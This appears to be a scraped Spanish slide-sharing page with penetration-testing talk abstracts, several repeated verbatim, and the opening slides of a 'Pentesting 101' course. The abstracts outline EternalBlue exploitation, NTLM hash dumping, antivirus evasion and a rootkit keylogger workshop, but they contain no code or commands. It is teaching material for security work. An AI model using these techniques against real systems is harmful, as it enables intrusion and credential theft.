El documento presenta la biografía y experiencia de Paulino Calderón Pale. Brevemente, Calderón Pale es fundador de Websec México, ha contribuido a proyectos como Google Summer of Code y Nmap, y ha escrito libros sobre pentesting y Nmap. También ha desarrollado aplicaciones para Android y ofrece servicios de consultoría en seguridad.
Plática sobre utilizar diferentes técnicas para detener a scanners de seguridad y a la gente que los usa sin pensarlo.
Impartida en CISI 2018, DragonJARCON 2018, 8.8 Bolivia, 8.8 Perú y 8.8 México.
Grabación en video:
https://www.youtube.com/watch?v=NtQpzjgitao&t=1s
A veces la diferencia entre poder acceder a un sistema remoto con éxito o fallar puede ser el conocimiento de una herramienta, una línea de comando o incluso una técnica de evasión de AV/Firewall. Esta plática brindará consejos y trucos para poder hackear "like a Boss", que le dará una ventaja durante la auditoría de un sistema
Ponente: Roberto Salgado. Director técnico y co-fundador de Websec México. Roberto ha participado y contribuido en proyectos importantes como ModSecurity, PHPIDS, sqlmap y el libro “Web Application Obfuscation“. Creó la base de conocimientos de inyección SQL, una de las referencias más completas disponibles en la web y Panoptic, un buscador de rutas de archivos comunes con vulnerabilidades tipo LFI. También desarrollo el método más rápido para extraer información de bases de datos vulnerables a inyección a ciegas.
Introducción al escaneo masivo
Herramientas: Nmap, Dnmap, Zmap, Masscan
Escaneo con Botnet de ruteadores
Escaneos diarios de todo Internet por un año
Estadísticas de dispositivos de México
Puertas traseras de dispositivos populares de México
Dumpeando hashes del controlador de dominio por @_hkm
Una plática rápida sobre una de las técnicas más redituables durante una prueba de penetración. Utilizando una cuenta con permisos de administrador de dominio mostraremos como dumpear todos los hashes en formato NTLM almacenados en el controlador de dominio del directorio activo.
Taller: Exploración de redes con Nmap.
Exploración de redes.
○ Conceptos.
○ Fundamentos básicos de Nmap
○ Técnicas de descubrimiento de hosts
○ Identificación de sistemas operativos
Descubrimiento de servicios.
○ Técnicas de escaneo de puertos
○ Identificación de servicios
Detección de vulnerabilidades.
○ Recolección de información
○ Ataques de fuerza bruta
○ Detectando vulnerabilidades en servidores web
Desarrollando para Nmap Scripting Engine (NSE) [GuadalajaraCON 2013]Websec México, S.C.
http://www.guadalajaracon.org/talleres/desarrollando-para-nmap-scripting-engine-nse/
Hace 5 años Nmap dió luz a su propio motor de scripts que facilita a administradores de sistema y pentesters ha realizar una variedad impresionante de tareas como recolección de información, detección de servicios y hasta explotación de vulnerabilidades.
Su flexibilidad y poder lo han convertido en una herramienta indispensable, no solo para escaneo de puertos, sino durante todas las etapas de una prueba de penetración.
En este taller los asistentes se familiarizarán con el motor de scripts de Nmap, aprenderán casos de uso avanzado y crearán sus propios scripts. Los participantes desarrollarán módulos para diversos fines incluyendo escaneo, análisis de tráfico y explotación web y de otros dispositivos.
Plática sobre utilizar diferentes técnicas para detener a scanners de seguridad y a la gente que los usa sin pensarlo.
Impartida en CISI 2018, DragonJARCON 2018, 8.8 Bolivia, 8.8 Perú y 8.8 México.
Grabación en video:
https://www.youtube.com/watch?v=NtQpzjgitao&t=1s
A veces la diferencia entre poder acceder a un sistema remoto con éxito o fallar puede ser el conocimiento de una herramienta, una línea de comando o incluso una técnica de evasión de AV/Firewall. Esta plática brindará consejos y trucos para poder hackear "like a Boss", que le dará una ventaja durante la auditoría de un sistema
Ponente: Roberto Salgado. Director técnico y co-fundador de Websec México. Roberto ha participado y contribuido en proyectos importantes como ModSecurity, PHPIDS, sqlmap y el libro “Web Application Obfuscation“. Creó la base de conocimientos de inyección SQL, una de las referencias más completas disponibles en la web y Panoptic, un buscador de rutas de archivos comunes con vulnerabilidades tipo LFI. También desarrollo el método más rápido para extraer información de bases de datos vulnerables a inyección a ciegas.
Introducción al escaneo masivo
Herramientas: Nmap, Dnmap, Zmap, Masscan
Escaneo con Botnet de ruteadores
Escaneos diarios de todo Internet por un año
Estadísticas de dispositivos de México
Puertas traseras de dispositivos populares de México
Dumpeando hashes del controlador de dominio por @_hkm
Una plática rápida sobre una de las técnicas más redituables durante una prueba de penetración. Utilizando una cuenta con permisos de administrador de dominio mostraremos como dumpear todos los hashes en formato NTLM almacenados en el controlador de dominio del directorio activo.
Taller: Exploración de redes con Nmap.
Exploración de redes.
○ Conceptos.
○ Fundamentos básicos de Nmap
○ Técnicas de descubrimiento de hosts
○ Identificación de sistemas operativos
Descubrimiento de servicios.
○ Técnicas de escaneo de puertos
○ Identificación de servicios
Detección de vulnerabilidades.
○ Recolección de información
○ Ataques de fuerza bruta
○ Detectando vulnerabilidades en servidores web
Desarrollando para Nmap Scripting Engine (NSE) [GuadalajaraCON 2013]Websec México, S.C.
http://www.guadalajaracon.org/talleres/desarrollando-para-nmap-scripting-engine-nse/
Hace 5 años Nmap dió luz a su propio motor de scripts que facilita a administradores de sistema y pentesters ha realizar una variedad impresionante de tareas como recolección de información, detección de servicios y hasta explotación de vulnerabilidades.
Su flexibilidad y poder lo han convertido en una herramienta indispensable, no solo para escaneo de puertos, sino durante todas las etapas de una prueba de penetración.
En este taller los asistentes se familiarizarán con el motor de scripts de Nmap, aprenderán casos de uso avanzado y crearán sus propios scripts. Los participantes desarrollarán módulos para diversos fines incluyendo escaneo, análisis de tráfico y explotación web y de otros dispositivos.
Explotación de vulnerabilidades recientes de Windows - Agosto 2017Websec México, S.C.
Información sobre vulnerabilidades recientes y cómo explotarlas. EternalBlue en Windows 7, EternalRomance en Windows 2016, LNK CVE-2017-8464 y SMBLoris en Windows 10. Presentación para alumnos de la UANL Universidad Autónoma de Nuevo León impartida durante el Congreso Internacional de Seguridad de la Información CISI en agosto del 2017.
Búsqueda de vulnerabilidades en aplicaciones de Android [GuadalajaraCON 2013]Websec México, S.C.
http://www.guadalajaracon.org/talleres/busqueda-de-vulnerabilidades-en-aplicaciones-moviles-android/
Con el incremento desmesurado de dispositivos móviles también crece nuestra preocupación por la seguridad de los usuarios que confiadamente usan aplicaciones de terceros sin ninguna precaución.
En este taller los asistentes aprenderán a usar las herramientas necesarias para identificar las vulnerabilidades más comunes en aplicaciones Android.
El taller abarcará desde la ingeniería inversa de las aplicaciones hasta el análisis de tráfico para la evaluación de servicios web involucrados.
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro JoaquínWebsec México, S.C.
Los métodos para escanear redes han evolucionado, y podemos encontrar millones de dispositivos de interconexión vulnerables que ponen en riesgo la información de sus propietarios y facilitan ataques a mayor escala. Mostraremos las técnicas que actualmente se utilizan para realizar escaneos de todo Internet y algunas vulnerabilidades predominantes.
Ponente: Pedro Joaquín. Director de Seguridad Corporativa de Websec México. En su blog Hakim.ws publica sus investigaciones referentes a dispositivos embebidos. Ha encontrado y publicado más de 15 vulnerabilidades de dispositivos utilizados en México. Es creador de Routerpwn y de la Comunidad Underground de México. Realiza auditorías y pruebas de penetración a infraestructura SCADA, SAP, servidores WebLogic, servidores iPlanet, routers Cisco, Solaris, Checkpoint FW, Citrix y Active Directory por nombrar algunas.
Video: https://www.youtube.com/watch?v=aqOQfjX8fD0
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]RootedCON
¿Qué hacer cuando se publica una nueva vulnerabilidad en un servicio que utilizamos? Veremos una vulnerabilidad reciente, analizaremos el método de explotación y aprenderemos a proteger nuestro servidor vulnerable.
4 dispositivos útiles durante auditorías de seguridad. La piña wifi con un firmware que permite simular redes confiables y realizar diferentes ataques a los clientes que se conectan. Un software y cable que pueden ser utilizados para desbloquear celulares y acceder automáticamente a la información del mismo con un app desde otro celular. Una tarjeta para romper passwords, que utiliza procesadores gráficos de bajo costo, la cual permite alcanzar velocidades de hasta 500 millones de intentos de passwords por segundo.
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)Jaime Sánchez
Cuando un usuario tiene que elegir una contraseña, tiende a construirla de la misma forma, con la misma información personal como base, y usando las mismas ideas para añadir complejidad a la misma. En este estudio que os mostraremos , nos hicimos con varios miles de millones de contraseñas reales, con el fin de hacer un análisis a gran escala de esos comportamientos comunes, extrayendo conclusiones que nos permitan crear procedimientos y herramientas específicas para mejorar las técnicas actuales de Password Cracking.
Finalmente, usaremos este conocimiento obtenido a través de distintos análisis conductuales y estadísticos para, utilizando redes neuronales y otras técnicas avanzadas, obtener patrones que nos permitan crackear hashes cuya resistencia suele ser bastante alta utilizando otras técnicas.
Abel Valero - VM + VFS = The Wooden Horse [rooted2018]RootedCON
Se mostrara como analizar malware altamente ofuscado con tecnicas avanzadas como es la implementacion de una maquina virtual para evitar mostrar el codigo real.
El objetivo es descifrar todos y cada uno de los componentes de este malware obteniendo el codigo original antes de pasar por su VM.
Para ello se ha creado distintas herramientas que facilitan esta tarea, veremos como fueron implementandose.
Por ultimo analizaremos el payload final y las tecnicas que utiliza para realizar sus implantes en distintos procesos del sistema, como es el uso de un sistema de archivos virtual (VFS), utilizado para ocultar los distintos componentes.
Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]RootedCON
Taller introductorio a la explotación de software GNU/Linux. Se explicarán diversos tipos de vulnerabilidades (corrupciones de memoria, fugas de información, condiciones de carrera, etc...) siguiendo metodologías actuales del desarrollo de exploits donde se sortearán las protecciones del sistema operativo.
Presentación
Nmap (Network Mapper) o por su traducción al español “Mapeador de Red”, es una herramienta libre y open source especializada en la exploración de redes y auditorías de seguridad. También es útil para tareas como realizar un inventario de la red, gestionar horarios para la actualización de servicios, además de vigilancia de hosts o tiempo de funcionamiento de un servicio.
Nmap utiliza paquetes IP en bruto para determinar cuales son los hosts disponibles en la red, cuales servicios (nombre y versión de la aplicación) ofrecen estos hosts, cuales sistemas operativos (y versiones del Sistema Operativo) están ejecutando, cual tipo de filtro de paquetes o firewall están utilizando, y docenas de otras características. Está diseñado para escanear rápidamente grandes redes, pero trabaja también muy bien con algunos hosts. Nmap puede ser ejecutado y utilizado en los principales sistemas operativos.
Este curso totalmente práctico proporciona una excelente guía para utilizar todas las funcionalidades y características incluidas en Nmap. Así mismo este curso es una excelente fuente de conocimiento tanto para aquellos quienes recién se inician con esta herramienta, como para los profesionales quienes lo utilizan constantemente.
Tecnologías avanzadas de descubrimiento y análisis de la Dark NetJavier Junquera
Presentación de la ponencia "Tecnologías avanzadas de descubrimiento y análisis de la Dark Net" en las XII Jornadas STIC organizadas por el CCN-CERT en 2018
Explotación de vulnerabilidades recientes de Windows - Agosto 2017Websec México, S.C.
Información sobre vulnerabilidades recientes y cómo explotarlas. EternalBlue en Windows 7, EternalRomance en Windows 2016, LNK CVE-2017-8464 y SMBLoris en Windows 10. Presentación para alumnos de la UANL Universidad Autónoma de Nuevo León impartida durante el Congreso Internacional de Seguridad de la Información CISI en agosto del 2017.
Búsqueda de vulnerabilidades en aplicaciones de Android [GuadalajaraCON 2013]Websec México, S.C.
http://www.guadalajaracon.org/talleres/busqueda-de-vulnerabilidades-en-aplicaciones-moviles-android/
Con el incremento desmesurado de dispositivos móviles también crece nuestra preocupación por la seguridad de los usuarios que confiadamente usan aplicaciones de terceros sin ninguna precaución.
En este taller los asistentes aprenderán a usar las herramientas necesarias para identificar las vulnerabilidades más comunes en aplicaciones Android.
El taller abarcará desde la ingeniería inversa de las aplicaciones hasta el análisis de tráfico para la evaluación de servicios web involucrados.
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro JoaquínWebsec México, S.C.
Los métodos para escanear redes han evolucionado, y podemos encontrar millones de dispositivos de interconexión vulnerables que ponen en riesgo la información de sus propietarios y facilitan ataques a mayor escala. Mostraremos las técnicas que actualmente se utilizan para realizar escaneos de todo Internet y algunas vulnerabilidades predominantes.
Ponente: Pedro Joaquín. Director de Seguridad Corporativa de Websec México. En su blog Hakim.ws publica sus investigaciones referentes a dispositivos embebidos. Ha encontrado y publicado más de 15 vulnerabilidades de dispositivos utilizados en México. Es creador de Routerpwn y de la Comunidad Underground de México. Realiza auditorías y pruebas de penetración a infraestructura SCADA, SAP, servidores WebLogic, servidores iPlanet, routers Cisco, Solaris, Checkpoint FW, Citrix y Active Directory por nombrar algunas.
Video: https://www.youtube.com/watch?v=aqOQfjX8fD0
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]RootedCON
¿Qué hacer cuando se publica una nueva vulnerabilidad en un servicio que utilizamos? Veremos una vulnerabilidad reciente, analizaremos el método de explotación y aprenderemos a proteger nuestro servidor vulnerable.
4 dispositivos útiles durante auditorías de seguridad. La piña wifi con un firmware que permite simular redes confiables y realizar diferentes ataques a los clientes que se conectan. Un software y cable que pueden ser utilizados para desbloquear celulares y acceder automáticamente a la información del mismo con un app desde otro celular. Una tarjeta para romper passwords, que utiliza procesadores gráficos de bajo costo, la cual permite alcanzar velocidades de hasta 500 millones de intentos de passwords por segundo.
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)Jaime Sánchez
Cuando un usuario tiene que elegir una contraseña, tiende a construirla de la misma forma, con la misma información personal como base, y usando las mismas ideas para añadir complejidad a la misma. En este estudio que os mostraremos , nos hicimos con varios miles de millones de contraseñas reales, con el fin de hacer un análisis a gran escala de esos comportamientos comunes, extrayendo conclusiones que nos permitan crear procedimientos y herramientas específicas para mejorar las técnicas actuales de Password Cracking.
Finalmente, usaremos este conocimiento obtenido a través de distintos análisis conductuales y estadísticos para, utilizando redes neuronales y otras técnicas avanzadas, obtener patrones que nos permitan crackear hashes cuya resistencia suele ser bastante alta utilizando otras técnicas.
Abel Valero - VM + VFS = The Wooden Horse [rooted2018]RootedCON
Se mostrara como analizar malware altamente ofuscado con tecnicas avanzadas como es la implementacion de una maquina virtual para evitar mostrar el codigo real.
El objetivo es descifrar todos y cada uno de los componentes de este malware obteniendo el codigo original antes de pasar por su VM.
Para ello se ha creado distintas herramientas que facilitan esta tarea, veremos como fueron implementandose.
Por ultimo analizaremos el payload final y las tecnicas que utiliza para realizar sus implantes en distintos procesos del sistema, como es el uso de un sistema de archivos virtual (VFS), utilizado para ocultar los distintos componentes.
Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]RootedCON
Taller introductorio a la explotación de software GNU/Linux. Se explicarán diversos tipos de vulnerabilidades (corrupciones de memoria, fugas de información, condiciones de carrera, etc...) siguiendo metodologías actuales del desarrollo de exploits donde se sortearán las protecciones del sistema operativo.
Presentación
Nmap (Network Mapper) o por su traducción al español “Mapeador de Red”, es una herramienta libre y open source especializada en la exploración de redes y auditorías de seguridad. También es útil para tareas como realizar un inventario de la red, gestionar horarios para la actualización de servicios, además de vigilancia de hosts o tiempo de funcionamiento de un servicio.
Nmap utiliza paquetes IP en bruto para determinar cuales son los hosts disponibles en la red, cuales servicios (nombre y versión de la aplicación) ofrecen estos hosts, cuales sistemas operativos (y versiones del Sistema Operativo) están ejecutando, cual tipo de filtro de paquetes o firewall están utilizando, y docenas de otras características. Está diseñado para escanear rápidamente grandes redes, pero trabaja también muy bien con algunos hosts. Nmap puede ser ejecutado y utilizado en los principales sistemas operativos.
Este curso totalmente práctico proporciona una excelente guía para utilizar todas las funcionalidades y características incluidas en Nmap. Así mismo este curso es una excelente fuente de conocimiento tanto para aquellos quienes recién se inician con esta herramienta, como para los profesionales quienes lo utilizan constantemente.
Tecnologías avanzadas de descubrimiento y análisis de la Dark NetJavier Junquera
Presentación de la ponencia "Tecnologías avanzadas de descubrimiento y análisis de la Dark Net" en las XII Jornadas STIC organizadas por el CCN-CERT en 2018
STIC XV CCN-CERT - Cibervigilancia con warrior (Ivan Portillo y Wiktor Nykiel)Iván Portillo
Taller impartido en las Jornadas STIC XV del CCN-CERT (2021) junto a Wiktor Nykiel.
Taller enfocado en la capacitación de técnicas de cibervigilancia a través de diferentes escenarios y casos prácticos para la detección de amenazas utilizando las fuentes abiertas. El objetivo principal del taller es mostrar una metodología de investigación guiada de un caso real y un entorno de entrenamiento con diferentes escenarios para mejorar las capacidades y procedimientos utilizados para la identificación de amenazas de manera proactiva.
Presentación
Nmap (Network Mapper) o por su traducción al español “Mapeador de Red”, es una herramienta libre y open source especializada en la exploración de redes y auditorías de seguridad. También es útil para tareas como realizar un inventario de la red, gestionar horarios para la actualización de servicios, además para realizar vigilancia de hosts o tiempo de funcionamiento de un servicio.
Nmap utiliza paquetes IP en bruto para determinar cuales hosts están disponibles en la red, cuales servicios (nombre y versión de la aplicación) ofrecen estos hosts, cuales sistemas operativos (y versiones del sistema operativo) están ejecutando, cual tipo de filtro de paquetes o firewall están utilizando, y docenas de otras características. Está diseñado para escanear rápidamente redes de gran tamaño, pero también funciona muy bien con pocos hosts. Nmap puede ser ejecutado y utilizado en los principales sistemas operativos.
Este curso totalmente práctico proporciona una excelente guía para utilizar todas las funcionalidades y características incluidas en Nmap. Así mismo este curso es una excelente fuente de conocimiento tanto para quienes recién se inician con la utilización de esta herramienta, como para los profesionales quienes lo utilizan constantemente.
VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...Internet Security Auditors
Como respuesta a nuestra cada vez mayor necesidad de almacenamiento de información, la proliferación de servicios de almacenamiento se ha convertido en un habitual de nuestro día a día, tanto en nuestros sistemas particulares como dentro de la organización donde desempeñamos nuestras tareas. Desde el punto de vista del análisis forense, entender las principales tecnologías en uso, su integración con los sistemas operativos más empleados y las evidencias tecnologías presentes en los sistemas se ha convertido en una necesidad en la mayoría de investigaciones. El objetivo de la ponencia es introducir al oyente tanto en la arquitectura de los servicios como en las evidencias presentes en los sistemas, cubriendo las principales tecnologías en uso.
Metsploit es una herramienta muy potente de Pentesting y hacking etico.. Metasploit Framework, una herramienta para el desarrollo y ejecución de código de explotación en contra de un equipo de destino remoto. El Proyecto Metasploit también es bien conocido por las herramientas anti-forenses y de evasión, algunos de los cuales se construyen en el marco de Metasploit.
Similar a Pentesting 101 por Paulino Calderon (20)
Estadisticas de redes 802.11 en Mexico (2013) por Paulino CalderonWebsec México, S.C.
Investigación sobre el estado de fabricantes y de mecanismos de seguridad utilizados en redes inalámbricas 802.11 en México por Paulino Calderon. (2013)
Escribiendo firmas para el sistema de detección de versiones de NmapWebsec México, S.C.
En esta presentación aprendemos como funciona el sistema de detección de versiones de Nmap y como podemos escribir nuestras propias firmas para reconocer nuevos servicios en nuestra red.
El porqué está fallando tu programa de seguridad informática por Paulino Cald...Websec México, S.C.
Plática sobre las razones por las cuales fallan los programas de seguridad informática en las empresas actualmente. Experiencias personales que me han ocurrido a lo largo de mi carrera.
Esta charla trata sobre las vulnerabilidades más peligrosas que afectan a redes caseras y de trabajo actualmente. Se demostrarán técnicas reales que funcionan incluso en ambientes corporativos protegidos y que pueden ser utilizadas para comprometer redes enteras en menos de un día.
OSINT vs cibercrimen por @nickops
Conoce técnicas y herramientas de Inteligencia de Fuentes Abiertas (OSINT) que te ayudarán a reaccionar ante delitos de fraudes y extorsiones cibernéticas. Analizaremos un caso donde la Policía Cibernética de la Ciudad de México descubrió, investigó y capturó a una banda de extorsionadores por Internet.
Fraudes y extorsión cibernética.
Técnicas y herramientas de la Policía cibernética.
Técnicas y herramientas de OSINT.
- OSINT con Apps de Mensajería Instantánea.
- OSINT con entidades privadas y de Gobierno.
- OSINT con Facebook Graph Search.
Acerca del ponente @nickops:
Ingeniero en Telemática, egresado del Instituto Politécnico Nacional (UPIITA). Laboró en el GSC Ericsson México participando en proyectos de telefonía IP, móvil y fija. Es aficionado a la Seguridad Informática y se especializa en investigaciones cibernéticas con fuentes abiertas (Open Source Intelligence). Colaboró con la Unidad de Investigación Cibernética de la Procuraduría General de Justicia del Distrito Federal (PGJDF) en la búsqueda de una banda de extorsionadores por Internet. Es miembro de la Comunidad G3eckArmy y cuenta con publicaciones en blogs sobre Tecnología, Seguridad Informática y Protección de Datos Personales.
Recuperación de defaces y modificación de bases de datos con versionador git por @Alevsk
El objetivo es añadir una capa de seguridad extra a nuestros sitios o blog personales (y a proyectos mas grandes ¿Por que no?) para evitar y recuperarnos de los hackeos, con ayuda de algunos scripts en bash corriendo en background y Git podemos detectar cambios en los archivos de nuestro servidor y regresar al estado "trusted" que tiene el repositorio de Git, de igual manera revisando los checksums de las tablas en nuestra base de datos podemos saber si se ha insertado, eliminado o modificado algún registro o tabla (en el caso de sql injection y xss en la base de datos) y restaurarla rápidamente usando una copia. :)
Seguridad de Bitcoin por Luis Daniel Beltrán
- Descripción breve de como funciona el protocolo y la cadena de bloques.
- Mitos sobre el protocolo.
- Puntos fuertes del protocolo.
- Puntos débiles del protocolo.
- Descripción de como se han dado los robos mas representativos de Bitcoins.
- Explicación del reto que tenemos como profesionales en seguridad con este nuevo paradigma en el manejo de activos digitales.
Acerca del ponente Luis Daniel Beltrán
Desde muy temprana edad y de manera autodidacta se introdujo en el mundo de la tecnología llevándolo con los años a ser uno de los primeros usuarios de Internet en México. En la actualidad se especializa en montar y administrar infraestructura de seguridad para aplicaciones y sitios web de alto tráfico. Desde el año 2012 dedica parte de su tiempo libre al estudio de las criptomonedas.
CPMX5 - Las nuevas generaciones de redes por Luis ColungaWebsec México, S.C.
¿Te frustras cuando la comunicación inalámbrica falla cuando más la necesitas? ¿Sabías que es posible recibir señales de aviones, barcos o satélites de una manera fácil y económica? Software Defined Radio nos da herramientas para solucionar los problemas en las redes inalámbricas actuales y realizar cosas que antes eran imposibles.
Ponente: Luis Colunga. Investigador de Seguridad Informática con Websec. Desde los 11 años ha estado involucrado en las telecomunicaciones. Una de sus pasiones es propiciar la generación de soluciones a través de las telecomunicaciones, le preocupa que estos sistemas sean "seguros"
Video: https://www.youtube.com/watch?v=yuvLT0ALAoE
CPMX5 - (IN)seguridad en infraestructura tecnológica por Paulino CalderónWebsec México, S.C.
En esta plática analizaremos las amenazas a las que están expuestos los usuarios de Internet y organizaciones. Se demostrarán vulnerabilidades que afectan actualmente a diversos dispositivos. Además se presentarán estadísticas nunca antes publicadas sobre el estado actual de la seguridad del ecosistema de redes inalámbricas encontradas en México.
Ponente: Paulino Calderón. Consultor de seguridad informática y desarrollador de software. Es cofundador de Websec. Con experiencia en administración de servidores, diseño de software y auditorías de seguridad de aplicaciones web e infraestructuras de TI. Forma parte del equipo oficial de Nmap como desarrollador NSE. Es el autor de una de las aplicaciones más populares en México en la historia: Mac2wepkey HHG5XX.
Video: https://www.youtube.com/watch?v=V5ofjARl--4
Descripción de un ataque a un ruteador 2Wire que muestra como es posible desde un ataque al ruteador, obtener los datos de sesión de sitios importantes. El ataque que se realiza es pharming pero de una manera especial, ya que no se redirigen las páginas para montar un scam o página falsa, si no que se redirigen subdominios de los dominios originales y se intenta, en ese momento, realizar las peticiones con el cliente a los sitios para obtener las cookies de los dominios originales.
Código completo y video en:
http://www.websec.mx/blog/ver/Robo_de_cookies_por_router_vulnerable_caso_2Wire
Mac2WepKey
Es posible generar la WEP/WPA default de los módems Huawei modelos HG520 y HG530. El propósito de este post es explicar la forma en la que desarrollamos un generador para estos dispositivos. Los módems Huawei modelos HG520b y HG520c cuentan con un software para generar su contraseña WEP y SSID predeterminados a partir de su dirección MAC. El nombre de este software es mac2wepkey y se encuentra disponible en su interfaz de TELNET. Es posible cambiar la dirección MAC de nuestro módem para generar la WEP prederterminada de otro módem del cual conozcamos su dirección MAC.
Más información:
http://www.websec.mx/blog/ver/mac2wepkey_huawei
El dispositivo Teensy es un pequeño microcontrolador HID programable con interfaz USB. Permite emular un teclado y mouse para enviar comandos a cualquier sistema operativo. Sus puertos digitales y análogos facilitan la integración de fotoceldas y otros componentes que pueden servir para condicionar la ejecución de acuerdo a la cantidad de luz, temperatura, movimiento, etc. El Teensy es una buena herramienta para pentesting. Con este dispositivo regresa el problema del Autorun USB, pero ahora para cualquier sistema operativo. Se mostrarán ejemplos de personas que han estado trabajando en él y como se puede utilizar en pruebas de penetración. También se mostrarán ejemplos de su uso en situaciones que no tienen que ver con seguridad.
Material:
http://www.hakim.ws/teensy/
En este taller práctico aprenderemos a desarrollar módulos de Kernel que funcionen como rootkits. Al final del taller el participante podrá mostrar un pequeño rootkit que funcione como keylogger. Entenderá y desarrollara técnicas para ocultarse y métodos anti-forenses.
Objetivo Principal:
Aprender las técnicas de desarrollo de Rootkits
Objetivos Secundarios:
Conocer las características del Kernel.
Aprender a generar módulos de Kernel
Conociendo algunas téncias (VFS Hijacking, Syscall Hijacking, StructTask Hijack, Infecting LKM’s)
Temario
Introducción a los Rootkits
Introducción a los Módulos de Kernel
Consideraciones de Programación
Parámetros de Módulos
Estructuras del Kernel
Hijacking
Prácticas
El módulo “Hello World”
Manejando Parámetros en el módulo.
Trabajando con la task_struct
Escondiendo módulos
Hijacking de /proc
Hijacking de syscall
Creando de un keylogger
Requisitos:
Conocimientos medios en C
Manejo básico/medio de linux
Una PC/Laptop con VirtualBox (Se entregará a cada participante una imágen con Debian 64Bits para que comiencen a desarrollar).
Vulnerabilidades en tecnologías NFC y RFID [GuadalajaraCON 2013]Websec México, S.C.
http://www.guadalajaracon.org/conferencias/vulnerabilidades-en-tecnologia-nfc-y-rfid/
Actualmente las nuevas tecnologías se incorporan a nuestra vida cotidiana de manera casí instantanea, pero no estamos concientes de todo lo que implica adoptar una nueva tecnología.
El ejemplo más reciente es la adopción, en los últimos años, de la tecnología contactless que actualmente encontramos en dispositivos móviles, formas de pago y tarjetas de acceso. Pero, ¿realmente la implementación esta hecha de forma segura? ¿podemos hacer pagos sin que sea “secuestrada” nuestra información?.
Vulnerabilidades de NFC fueron presentadas el año pasado en BlackHat Las Vegas, en una conferencia de vectores de ataques enfocada a smartphones y NFC. La conferencia de GuadalajaraCON va enfocada a tarjetas de acceso de oficinas y transporte.
Se expondrá el uso de la RFID/NFC en la actualidad.
Se realizará una demostración en vivo de clonacion de NFC.
Desarrollo de exploit para infraestructura crítica [GuadalajaraCON 2013]Websec México, S.C.
http://www.guadalajaracon.org/conferencias/desarrollo-de-exploit-para-infraestructura-critica/
En la actualidad la mayoría de los sistemas en los que dependemos están casi en su totalidad automatizados y muchos otros se encuentran a punto de serlo. En los últimos años se ha demostrado como ciberdelincuentes comprometen esta infraestructura crítica, pasando del malware Stuxnet a el secuestro de drones.
La ponencia se enfoca en la importancia de proteger infraestructura sensible y como dichos sistemas pueden ser comprometidos, haciendo énfasis en el descubrimiento y desarrollo de un exploit funcional para infraestructura crítica.
2. ● Soy fundador/Consultor de Websec México:
http://websec.mx
● Fuí parte del programa Google Summer Of Code 2011:
https://code.google.com/p/google-summer-of-code-2011-nmap/
● Soy desarrollador NSE del proyecto Nmap:
http://nmap.org
● He contribuido con módulos oficiales del proyecto Metasploit:
http://www.rapid7.com/db/search?q=paulino+calderon
#cat /etc/about
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
3. ● He desarrollado algunas apps de Android:
○ Mac2wepkey HHG5XX (+5 millones de descargas)
https://play.google.com/store/apps/details?id=mx.websec.
mac2wepkey.hhg5xx
○ IP2hosts (+5 mil descargas)
https://play.google.com/store/apps/details?id=websec.ip2hosts
○ Vecinitum de fibra (+10 mil descargas)
https://play.google.com/store/apps/details?id=mx.websec.
mac2wepkey.al
#cat /etc/about
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
4. Y he escrito un par de libros:
○ Nmap 6: Network Exploration and Security Auditing Cookbook (5
estrellas en Amazon)
http://www.amazon.com/Nmap-exploration-security-auditing-
ebook/dp/B00AC1HF8W/
○ Mastering the Nmap Scripting Engine (Nov 2014)
http://www.amazon.com/Mastering-Scripting-Engine-Paulino-
Calderon/dp/1782168311/
Entre otras cosas: http://calderonpale.com
#cat /etc/about
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
7. Pen testing 101
● ¿Qué es un pentest?
● ¿Qué se obtiene de un buen pentest?
● ¿Cómo podemos llegar a ser buenos pentesters?
Paulino Calderon Pale <calderon@websec.mx>Pentesting 101
8. Pentesting 101
● Existen varias metodologías y guías:
○ Penetration testing execution standard.
○ Open Source Security Testing Methodology Manual.
○ Technical Guide to Information Security Testing and
Assessment.
○ SANS’ Critical Security Controls.
○ OWASP TOP 10.
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
9. Pentesting 101: Fases
● Definición de alcance
● Information gathering
● Identificación de amenazas
● Identificación de vulnerabilidades
● Explotación de vulnerabilidades
● Post explotación
● Generación de reportes =/
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
10. ● Recolección de información
○ Descubrimiento de activos con Nmap
● Explotación de vulnerabilidades
○ Explotación de vulnerabilidades con Metasploit
○ Uso del framework de explotación Veil
● Otros ataques
○ Ataques de ingeniería social con psploitgen
Agenda
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
11. Exploración de redes:
● Conceptos TCP/IP.
● Fundamentos básicos de Nmap
● Técnicas de descubrimiento de hosts
● Identificación de sistemas operativos
● Técnicas de escaneo de puertos
● Identificación de servicios
● Recolección de información
● Ataques de fuerza bruta
● Detección de vulnerabilidades
Explotación de vulnerabilidades:
● Uso de metasploit para la explotación de vulnerabilidades
● Identificación de servicios vulnerables
● Exfiltración de información utilizando metasploit
● Evasión de antivirus con Veil Evasion
Ataques de ingeniería social:
● Ataques de phishing
● Evasión de filtros con pssploitgen
¿Qué aprenderemos?
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
12. ● Kali 32 bits (root:toor)
Máquinas vulnerables:
● P1
●
Información de máquinas virtuales
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
14. Descubrimiento de activos
● Siempre usen Wireshark para analizar el tráfico como
ejercicio inicial.
● ¿Sabemos que equipos estan conectados a la red?
● ¿Cómo podemos hacer este proceso de la forma más
eficiente?
El arte de la exploración de redes informáticas Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
15. Wireshark
● Rápidamente se pueden listar los hosts comunicándose
en la red.
● Permite aplicar filtros para visualizar fácilmente la
información que necesitamos.
● Se obtiene mucha información sobre la red solo con
mirar el tráfico por 15 minutos.
El arte de la exploración de redes informáticas Paulino Calderon
calderon@websec.mx
